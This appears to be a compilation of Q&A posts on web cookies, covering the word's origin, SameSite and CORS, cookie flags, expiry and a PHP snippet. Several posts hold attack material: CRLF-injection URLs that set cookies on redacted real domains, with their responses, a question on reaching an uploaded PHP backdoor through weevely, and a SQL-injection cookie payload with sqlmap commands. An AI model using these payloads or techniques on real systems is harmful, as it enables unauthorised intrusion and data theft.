Origin of “Cookie” in Computing?

"Cookies" are a user-facing computing construct. They are codified in many technical specifications, including the earliest reference in an HTTP spec, RFC 2109, published February 1997.

Many claim the use in HTTP followed from UNIX "magic cookies." Eric Raymond provided a definition of what a "magic cookie" is:

Something passed between routines or programs that enables the receiver to perform some operation; a capability ticket or opaque identifier […]

OK.

But why did the UNIX community start using the phrase "cookie" to begin with? Is it because you put cookies into a jar, and take them out? When did this whole thing begin? Does anyone have a citation of the first usage?

Does the same site cookie policy potentially change anything for CORS

According to the new same-site cookie policy (once implemented across all browsers) , a third party call from another page would not send along the cookies by default, unless the third party explicitly indicates that by setting appropriate cookie metadata.

As per my understanding, this would help with CSRF prevention. Does it cover all cases for CSRF ? Can this policy obsolete the same-origin policy since it seems to solve the same problems, or does the same origin policy cover other use cases? Does this potentially mean that we wouldn’t need CORS setup on the servers anymore?

Cookie is not being set after CRLF Injection in one domain but set in another domain. How can i bypass/set it?

Ok i am facing a very weird behaviour that sets and doesnt set cookie both. So, first i have found CRLF injection in 2 domains, redacted.de and redacted_another.com. When i go to redacted_another.com vulnerable url, the cookie gets set into firefox-esr. This works in browser. There first vulnerable domain i encountered had this url:

https://www.redacted_another.com/lp/%0ASet-Cookie:%20dipesh=yadav

I can view cookies using developers tool. This is default behaviour as i think. The next domain i encountered had this vulnerable urls but it didnt work in browser 🙁 :

http://www.redacted.de/forum/%0aSet-Cookie:%20dipesh=yadav http://www.redacted.de/sso/registration/account/%3f%0d%0aSet-Cookie:%20dipesh=yadav 

But when i visit this any urls from redacted.de it doest work in browser. Also, both redacted_another.com and redacted.de sets cookie in curl response. This is what it looks like for both redacted but the first one works in browser and second doesnt in browser. Working Curl request:

root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav  HTTP/2 301  date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 185 location: https://www.redacted.com/lp/redirects/?olp=/lp/ set-cookie: dipesh=yadav expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800  HTTP/2 200  date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 1452 vary: Accept-Encoding last-modified: Tue, 04 Feb 2020 15:54:26 GMT etag: "redacted" expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800 access-control-allow-origin: * accept-ranges: bytes 

NOT WORKING REQUEST:

root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz  HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 13 Aug 2020 15:05:04 GMT Content-Type: text/html Content-Length: 162 Location: https://www.redacted.de/sso/registration/account/ Set-Cookie: bugbounty=bugbountyplz Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT Cache-Control: private Age: 0 X-Frame-Options: DENY X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Connection: keep-alive  HTTP/2 200  server: nginx date: Thu, 13 Aug 2020 15:05:05 GMT content-type: text/html; charset=UTF-8 vary: Accept-Encoding access-control-allow-credentials: true access-control-allow-origin: https://www.redacted.de last-modified: Thu, 13 Aug 2020 15:05:05 GMT cache-control: no-cache, private age: 0 strict-transport-security: max-age=15768000 x-frame-options: DENY x-xss-protection: 1; mode=block x-content-type-options: nosniff accept-ranges: bytes  

Can anyone help me with this? Whats the problem that doesnt letme set cookie in redacted.de but i can set cookie in redacted_another.com.

Investigating header and cookie flag issues

I am working on issues reported by Nessus. Most of the issue types are missing headers and cookie flags.

The tricky part here is these issues have been reported at different port numbers, for example 443, 8008 and 8080.

Can anyone please help on how to check the request and response on these port numbers or how to check whether the security headers and cookie flags are set on different port numbers?

How to add session cookie in weevely?

I am pentesting a website and I was successful in uploading a php backdoor and finding the path of the backdoor. The only issue is that in order to gain access to the uploaded file I need to be logged in with my account. i can do this by adding my session cookies in weevely but how can I add my session cookies in weevely to access the backdoor file? Is there a way to do this or is it possible?

Cookie expiration time : Is it really necessary? [duplicate]

Why not cookies be just there forever? Why expiry time is needed? Unless the app is very security critical (like banking) I don’t find a reason to expire the session. Why irritate user frequently with auth ?

Should I have session expiration (X dasys since session created, X days since lsat visit etc) for my normal webapp?

SQLMap Cookie Injectioin with Working Manual SQLi

I’m using an existing exploit which calls for a cookie called wp_sap to be set with the following value:

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] 

This works great manually. Now, I’d like to be able to use this within SQLMap to enumerate the database automatically but have been struggling. I’ve tried the following variations to no avail.

sqlmap --cookie "wp_sap=[\"1650149780')) OR 1=2 " -u http://sandbox.local -p "wp_sap" --dbms "MariaDB" --suffix "#]" --level 5 --technique U -proxy http://127.0.0.1:8080  sqlmap --cookie="wp_sap=*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --prefix "[\"1650149780')) OR 1=2" --suffix "11#]" --level 5 --technique U -proxy http://127.0.0.1:8080  sqlmap --cookie="wp_sap=[\"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --suffix ",11#]" --level 5 --technique U -proxy http://127.0.0.1:8080 

I’d really appreciate some help to get this working.

Show/hide page content based on cookie from url parameter

I am looking to show some content on a page based on the on the parameter in a link.

If a link is given to a user https://www.examplesite.com/example-page?feeback=1 then they will see the content of the page, if not using the link, then users will not see the content.

Additionally, I need the users of the link to be able to look on other pages and return to the page where the content is hidden/shown and still see the content.

I have set a cookie in functions.php, that will expire in 30days

add_action('init', 'set_feedback_cookie');   function set_feedback_cookie () {     if (isset($  _GET['feedback'])) {     $  name = 'client_feedback';     $  value=$  _GET['feedback'];     setcookie($  name, $  value, time()+60*60*24*30, "/example-page/", "examplesite.com" , "true" ); } 

The cookie is loaded on to the page (as seen in chrome dev tools),

Now i just need to hide the content on the page. The section to hide has an id #form__feedback.

What code do i need to add to get the content to hide, is this code added to functions.php or to a page template?

Is php or jQuery the best option for doing this?